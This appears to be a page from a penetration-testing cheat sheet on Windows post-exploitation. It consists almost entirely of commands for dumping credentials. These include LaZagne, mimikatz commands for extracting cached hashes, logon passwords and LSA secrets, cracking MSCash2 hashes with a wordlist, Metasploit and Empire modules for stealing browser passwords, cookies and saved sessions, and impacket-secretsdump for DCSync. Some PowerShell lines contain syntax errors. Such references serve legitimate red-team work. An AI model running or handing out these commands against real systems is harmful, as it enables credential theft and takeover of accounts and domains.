Post Exploitation

LaZagne

Really simple and sweet tool for credential dumping

.\laZagne.exe all

MSCash

Mscash is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system after a successful logon

From mimikatz,

privilege::debug
lsadump::cache

Cracking it

john-jumbo mscash --wordlist=/usr/share/wordlists/rockyou.txt  --format=mscash2

Reading Event Logs

User must be in "Event Log Reader" group Follow this link

Get-WinEvent -ListLog *

# Listing logs of a specific user
$cred = Get-Credentials
Get -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred

# Reading Security logs
(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessNam
e';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={
$_.Properties[8].Value }}).commandline

Password Dumping

# Metasploit
post/windows/gather/enum_chrome
post/multi/gather/firefox_creds
post/firefox/gather/cookies
post/firefox/gather/passwords
post/windows/gather/forensics/browser_history
post/windows/gather/enum_putty_saved_sessions

# Empire
collection/ChromeDump
collection/FoxDump
collection/netripper
credentials/sessiongopher

# mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::secrets

# dcsync - secretsdump
impacket-secretsdump [email protected]

PreviousBypass-Evasion Techniques NextMiscellaneous

Last updated 3 years ago

hashtagLaZagne

hashtagMSCash

hashtagReading Event Logs

hashtagPassword Dumping

hashtag

hashtag

LaZagne

MSCash

Reading Event Logs

Password Dumping